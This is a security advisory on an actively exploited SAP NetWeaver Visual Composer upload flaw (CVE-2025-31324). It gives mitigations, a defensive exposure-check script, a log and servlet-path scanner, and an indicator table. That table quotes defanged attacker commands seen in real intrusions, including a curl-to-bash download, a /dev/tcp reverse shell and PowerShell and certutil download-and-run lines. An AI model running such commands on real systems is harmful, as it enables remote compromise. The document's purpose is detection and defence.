Active Exploitation of SAP's NetWeaver Visual Composer Metadata Uploader
13 May 2025
SAP has released an out-of-band security update to address a critical vulnerability in its NetWeaver Visual Composer Metadata Uploader product. Users and administrators of the affected product are advised to update to the latest version immediately.
Update on 8 May 2025
An open-source tool developed by Onapsis and Mandiant to help SAP customers identify potential compromise related to CVE-2025-31324 is available here: https://github.com/Onapsis/Onapsis-Mandiant-CVE-2025-31324-Vuln-Compromise-Assessment
SAP has released an out-of-band security update to address a critical vulnerability in its NetWeaver Visual Composer Metadata Uploader component (CVE-2025-31324). The vulnerability has a CVSS v3.1 base score of 10.0, the maximum, and is being actively exploited in the wild.
Successful exploitation could allow an unauthenticated attacker to upload arbitrary files, including executable content such as JSP web shells, to the application server, leading to remote code execution (RCE).
The vulnerability affects Visual Composer Framework 7.50. To check whether a system is exposed, send an unauthenticated GET request to https://[your-sap-server]/developmentserver/metadatauploader. If the endpoint returns its page (HTTP 200) without prompting for credentials, the system may be vulnerable. An HTTP 401 response or a redirect to the logon page indicates that authentication is being enforced, a 403 indicates the request is being blocked, and a 404 indicates the component is not deployed on that server. Confirm the patch level of the installed component against the SAP note linked below before treating a negative result as conclusive.
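As an added example (not code from SAP or from this advisory), the Python script below performs the unauthenticated GET described above and classifies the response. The endpoint path is the one given in the advisory; the status-code thresholds and the heuristic that treats a redirect whose Location contains "logon" or "login" as an authentication redirect are this example's own assumptions, as is the hostname in the usage line. It only sends a GET and never uploads anything.

```python
"""Probe /developmentserver/metadatauploader and report whether it answers an
unauthenticated GET (the exposure check described in the advisory).

Added example, not SAP's or the advisory's code. The verdict thresholds and the
logon/login redirect heuristic are this example's own assumptions.
Usage: python check_vc_uploader.py https://sap.example.internal:50001 [--insecure]
"""
import ssl
import sys
import urllib.error
import urllib.request

ENDPOINT_PATH = "/developmentserver/metadatauploader"  # path from the advisory


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following redirects so a 302 to a logon page stays visible."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def classify(status, headers=None):
    """Map the HTTP status of the unauthenticated GET to a verdict.

    likely-vulnerable: content served with no credentials (HTTP 200), the
                       condition the advisory describes.
    auth-required:     401/407, or a redirect to a logon/login page (heuristic).
    not-exposed:       403/404/410, i.e. blocked or not deployed.
    inconclusive:      anything else; inspect the response by hand.
    """
    location = (headers.get("Location", "") if headers else "").lower()
    if status == 200:
        return "likely-vulnerable"
    if status in (401, 407):
        return "auth-required"
    if status in (301, 302, 303, 307, 308):
        return "auth-required" if ("logon" in location or "login" in location) else "inconclusive"
    if status in (403, 404, 410):
        return "not-exposed"
    return "inconclusive"


def probe(base_url, timeout=10, verify_tls=True):
    """Send one GET to the uploader endpoint; return status, verdict and a body snippet."""
    url = base_url.rstrip("/") + ENDPOINT_PATH
    ctx = ssl.create_default_context()
    if not verify_tls:  # internal CAs are common on SAP systems; --insecure skips verification
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    opener = urllib.request.build_opener(_NoRedirect, urllib.request.HTTPSHandler(context=ctx))
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2025-31324-exposure-check"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            status, headers, body = resp.status, resp.headers, resp.read(2048)
    except urllib.error.HTTPError as err:  # 4xx/5xx and, because of _NoRedirect, 3xx land here
        status, headers, body = err.code, err.headers, err.read(2048)
    except (urllib.error.URLError, OSError) as err:
        return {"url": url, "status": None, "verdict": "unreachable", "snippet": str(err)}
    return {
        "url": url,
        "status": status,
        "verdict": classify(status, headers),
        "snippet": body[:160].decode("utf-8", "replace"),
    }


if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit(__doc__)
    result = probe(sys.argv[1], verify_tls="--insecure" not in sys.argv[2:])
    print(f"{result['url']} -> HTTP {result['status']} : {result['verdict']}")
    print(result["snippet"])
```

A "likely-vulnerable" verdict means the endpoint is reachable without credentials; it does not by itself prove the patch is missing, so pair it with the patch-level check against the SAP note.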
Users and administrators of the affected product version are advised to update to the latest version immediately. If unable to do so, users and administrators are advised to perform the following mitigations:
Restrict access to the /developmentserver/metadatauploader endpoint, for example by blocking it at the reverse proxy or SAP Web Dispatcher, or by limiting it to trusted administrative networks.
If Visual Composer is not in use, consider turning it off entirely.
Forward the SAP Java application server's HTTP access logs to a SIEM, alert on POST requests to /developmentserver/metadatauploader, and scan the servlet path (the ...\sap.com\irj\servlet_jsp\irj\root\ directory referenced in the indicators below) for unauthorized .jsp files, comparing anything found against the file names and SHA256 hashes listed.
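As an added example (not tooling from SAP, Onapsis, Mandiant or this advisory), the Python below implements the log and servlet-path checks just described using the indicators from the table that follows: it flags access-log requests from the listed IP addresses, POSTs to the uploader endpoint and requests for the listed web shell names, and it hashes files under the servlet root against the listed SHA256 values and file names. The common-log-format regex, the exec()/ProcessBuilder heuristic for JSP web shells and the sample log lines are this example's own assumptions and constructions; SAP's own access-log layout differs, so adapt LOG_RE to your log source.

```python
"""Scan access-log lines and the Visual Composer servlet root against the
indicators in the advisory's IOC table.

Added example, not tooling from SAP or the advisory. Assumptions: the
common-log-format regex (adapt LOG_RE for SAP's own access logs), the
exec()/ProcessBuilder web-shell heuristic, and SAMPLE_LOG, which is
constructed for this example.
"""
import hashlib
import os
import re
import sys
from pathlib import Path

UPLOADER_PATH = "/developmentserver/metadatauploader"

# Indicators copied from the advisory's table, with the [.] defanging removed.
IOC_IPS = {
    "205.169.39.55", "206.188.197.52", "65.49.235.210", "108.171.195.163",
    "47.97.42.177", "45.76.93.60", "158.247.224.100", "31.192.107.157",
    "107.173.135.116", "192.3.153.18", "188.166.87.88", "223.184.254.150",
    "51.79.66.183", "85.106.113.168", "138.68.61.82", "101.99.91.107",
    "103.207.14.195", "13.232.191.219",
}
IOC_SHA256 = {  # subset of the table; add the remaining hashes from the advisory
    "598b38f44564565e0e76aa604f915ad88a20a8d5b5827151e681c8866b7ea8b0",  # helper.jsp / usage.jsp
    "69bb809b3fee09ed3ec9138f7566cc867bd6f1e8949b5e3daff21d451c533d75",  # ran.jsp
    "df492597eb412c94155a7f437f593aed89cfec2f1f149eb65174c6201be69049",  # shell.jsp
    "888e953538ff668104f838120bc4d801c41adb07027db16281402a62f6ec29ef",  # GOREVERSE "config"
}
WEBSHELL_NAMES = {"helper.jsp", "usage.jsp", "ran.jsp", "shell.jsp", "Logout.jsp"}

# Assumed common log format: <ip> - - [<ts>] "<method> <path> HTTP/x" <status> <bytes>
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample lines for this example (not real log data).
SAMPLE_LOG = [
    '206.188.197.52 - - [15/Mar/2025:03:12:44 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 200 512',
    '10.0.0.8 - - [15/Mar/2025:03:13:01 +0000] "GET /irj/portal HTTP/1.1" 200 10240',
    '107.173.135.116 - - [29/Apr/2025:11:02:09 +0000] "GET /irj/helper.jsp?cmd=id HTTP/1.1" 200 311',
]


def scan_log_lines(lines, known_ips=IOC_IPS, known_names=WEBSHELL_NAMES):
    """One finding per (line, reason): ioc-ip, uploader-post, uploader-get, webshell-request."""
    findings = []
    for num, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path = m["ip"], m["method"].upper(), m["path"].split("?", 1)[0]
        reasons = []
        if ip in known_ips:
            reasons.append("ioc-ip")
        if path.lower().startswith(UPLOADER_PATH):
            # exploitation is an unauthenticated POST to this endpoint; GETs are usually scanners
            reasons.append("uploader-post" if method == "POST" else "uploader-get")
        if os.path.basename(path) in known_names:
            reasons.append("webshell-request")
        findings.extend({"line": num, "ip": ip, "path": path, "reason": r} for r in reasons)
    return findings


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def scan_files(entries, known_hashes=IOC_SHA256, known_names=WEBSHELL_NAMES):
    """entries: iterable of (relative_path, content_bytes). At most one finding per file:
    ioc-hash (certain), ioc-filename (strong), exec-in-jsp (heuristic, review by hand)."""
    known_hashes = {h.lower() for h in known_hashes}
    findings = []
    for rel, data in entries:
        name, digest = os.path.basename(rel), sha256_hex(data)
        if digest in known_hashes:
            reason = "ioc-hash"
        elif name in known_names:
            reason = "ioc-filename"
        elif name.lower().endswith(".jsp") and (
            b"Runtime.getRuntime().exec(" in data or b"ProcessBuilder(" in data
        ):
            reason = "exec-in-jsp"
        else:
            continue
        findings.append({"path": rel, "sha256": digest, "reason": reason})
    return findings


def scan_servlet_root(root):
    """Walk the servlet root (the ...\\sap.com\\irj\\servlet_jsp\\irj\\root directory from the IOC table)."""
    root = Path(root)
    return scan_files((str(p.relative_to(root)), p.read_bytes()) for p in root.rglob("*") if p.is_file())


if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG):
        print("LOG ", f)
    if len(sys.argv) > 1:
        for f in scan_servlet_root(sys.argv[1]):
            print("FILE", f)
```

The exec-in-jsp heuristic will also match legitimate JSPs that spawn processes, so treat it as a triage queue rather than a verdict; hash and file-name matches against the table are the high-confidence signals.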
Indicators of compromise
Indicator | Data | Note |
IPv4 address | 205.169.39[.]55 | Tested exploit in January 2025 |
IPv4 address | 206.188.197[.]52 | Exploited vulnerability and deployed web shells in March 2025 |
IPv4 address | 65.49.235[.]210 | Hosting suspicious payload |
IPv4 address | 108.171.195[.]163 | Hosting suspicious payload |
IPv4 address | 47.97.42[.]177 | GOREVERSE C2 |
IPv4 address | 45.76.93[.]60 | Reverse SSH SOCKS proxy C2 |
IPv4 address | 158.247.224[.]100 | Hosting suspicious payload |
IPv4 address | 31.192.107[.]157 | Hosting suspicious payload |
IPv4 address | 107.173.135[.]116 | Attempted GET requests against several already reported web shell names |
IPv4 address | 192.3.153[.]18 | Attempted GET requests against several already reported web shell names to download reported Supershell malware from the domain overseas-recognized-athens-oakland.trycloudflare[.]com |
IPv4 address | 188.166.87[.]88 | Attempted GET requests against several already reported web shell names |
IPv4 address | 223.184.254[.]150 | Attempted GET requests against several already reported web shell names |
IPv4 address | 51.79.66[.]183 | Attempted GET requests against several already reported web shell names |
IPv4 address | 85.106.113[.]168 | Attempted GET requests against the helper.jsp web shell to download and execute a bash command from 138.68.61[.]82 |
IPv4 address | 138.68.61[.]82 | Reverse shell C2 |
IPv4 address | 101.99.91[.]107 | Attempted GET requests against several already reported web shell names |
IPv4 address | 103.207.14[.]195 | Attempted GET requests against several already reported web shell names |
IPv4 address | 13.232.191[.]219 | Attempted GET requests against several already reported web shell names |
FQDN | ocr-freespace.oss-cn-beijing.aliyuncs[.]com | Hosted GOREVERSE payload |
FQDN | overseas-recognized-athens-oakland.trycloudflare[.]com | Hosted reported SUPERSHELL payload |
FQDN | d-69b.pages[.]dev | Hosting suspicious payload |
Command | curl 138.68.61[.]82|bash | Downloads and executes the reverse shell command in the next row (bash -i >& /dev/tcp/138.68.61[.]82/4544 0>&1) |
Command | bash -i >& /dev/tcp/138.68.61[.]82/4544 0>&1 | Establishes reverse shell from a compromised SAP server |
Command | (curl -sk hxxps://overseas-recognized-athens-oakland.trycloudflare[.]com/v2.js || wget --no-check-certificate -q -O - hxxps://overseas-recognized-athens-oakland.trycloudflare[.]com/v2.js) | bash -sh | Attempted to download reported SUPERSHELL payload |
Command | powershell Invoke-WebRequest -Uri "hxxp://31.192.107[.]157:38205/ReportQueue.exe" -OutFile "C:\programdata\ReportQueue.exe" | Attempting to download a suspicious payload |
Command | powershell Invoke-WebRequest -Uri "hxxp://158.247.224[.]100:38205/EACA38DB.tmp" -OutFile "C:\programdata\EACA38DB.tmp" | Attempting to download a suspicious payload |
Command | powershell curl -o "C:\users\public\ansgdhs.bat" hxxp://101.32.26[.]154/rymhNszS/ansgdhs.bat | Attempting to download a malicious Batch file |
Command | powershell IEX(New-Object Net.WebClient).DownloadString('hxxps://d-69b.pages[.]dev/sshb64.ps1') | Attempting to download a malicious PowerShell script |
Command | certutil.exe -urlcache -split -f hxxp://108.171.195[.]163:8000/$FILE_NAME$.txt ~\sap.com\irj\servlet_jsp\irj\root\Logout.jsp | Attempting to download suspicious payload |
Command | powershell (new-object Net.WebClient).DownloadFile('hxxp://108.171.195[.]163:8000/$FILE_NAME$.txt','~\sap.com\irj\servlet_jsp\irj\root\Logout.jsp') | Attempting to download suspicious payload |
Command | powershell Invoke-WebRequest -Uri "hxxp://65.49.235[.]210/download/2.jpg" -OutFile "cmake.exe" | Attempting to download unknown payload |
SHA256 hash | df492597eb412c94155a7f437f593aed89cfec2f1f149eb65174c6201be69049 | Downloaded from 101.32.26[.]15 named shell.jsp |
SHA256 hash | 9fb57a4c6576a98003de6bf441e4306f72c83f783630286758f5b468abaa105d | Downloaded by ansgdhs.bat named 0g9pglZr74.ini. This suspicious file is downloaded from 101.32.26[.]15. |
SHA256 hash | c7b9ae61046eed01651a72afe7a31de088056f1c1430b368b1acda0b58299e28 | Downloaded by ansgdhs.bat and named wbemcomn.dll. This suspicious file is downloaded from 101.32.26[.]154 and is possibly used for DLL side-loading. |
SHA256 hash | 3f5fd4b23126cb21d1007b479954af619a16b0963a51f45cc32a8611e8e845b5 | Batch file downloaded from 101.32.26[.]154 named ansgdhs.bat |
SHA256 hash | 598b38f44564565e0e76aa604f915ad88a20a8d5b5827151e681c8866b7ea8b0 | JSP webshell named helper.jsp and usage.jsp |
SHA256 hash | 888e953538ff668104f838120bc4d801c41adb07027db16281402a62f6ec29ef | GOREVERSE reverse shell, named config |
SHA256 hash | 5919f2eab8a826d7ba84e6c413626f5d11ed412d7df0d3ab864f31d3a8db3763 | Batch script that attempts to download GOREVERSE and executes it |
SHA256 hash | 5a8ddc779dcf124fe5692d15be44346fb6d742322acb0eb3c6b4e90f581c5f9e | Payload downloaded from 65.49.235[.]210 named 2.jpg |
SHA256 hash | 427877aadd89f427e1815007998d9bb88309c548951a92a6e4064df001e327c2 | Base64-encoded PowerShell Script downloaded from d-69b.pages[.]dev named sshb64.ps1 that creates reverse SSH SOCKS proxy |
SHA256 hash | 69bb809b3fee09ed3ec9138f7566cc867bd6f1e8949b5e3daff21d451c533d75 | JSP web shell named ran.jsp |
SHA256 hash | b9ef95ca541d3e05a6285411005f5fee15495251041f78e715234b09d019b92c | Suspected web shell |
SHA256 hash | 1abf922a8228fd439a72cfddf1ed08ea09b59eaa4ae5eeba1d322d5f3e3c97e8 | Suspected web shell |
SHA256 hash | 2e6f348f8296f4e062c397d2f3708ca6fdeab2c71edfd130b2ca4c935e53c0d3 | Suspected web shell |
SHA256 hash | 6c6c984727dc53af110ed08ec8b15092facb924c8ad62e86ec76b52a00a41a40 | Suspected web shell |
SHA256 hash | 4b17beee8c2d94cf8e40efc100651d70d046f5c14a027cf97d845dc839e423f9 | Suspected web shell |
SHA256 hash | 7aab6ec707988ff3eec37f670b6bb0e0ddd02cc0093ead78eb714abded4d4a79 | Suspected web shell |
SHA256 hash | b3e4c4018f2d18ec93a62f59b5f7341321aff70d08812a4839b762ad3ade74ee | Suspected web shell |
More information is available here:
https://me.sap.com/notes/3594142
https://nvd.nist.gov/vuln/detail/CVE-2025-31324
https://unit42.paloaltonetworks.com/threat-brief-sap-netweaver-cve-2025-31324/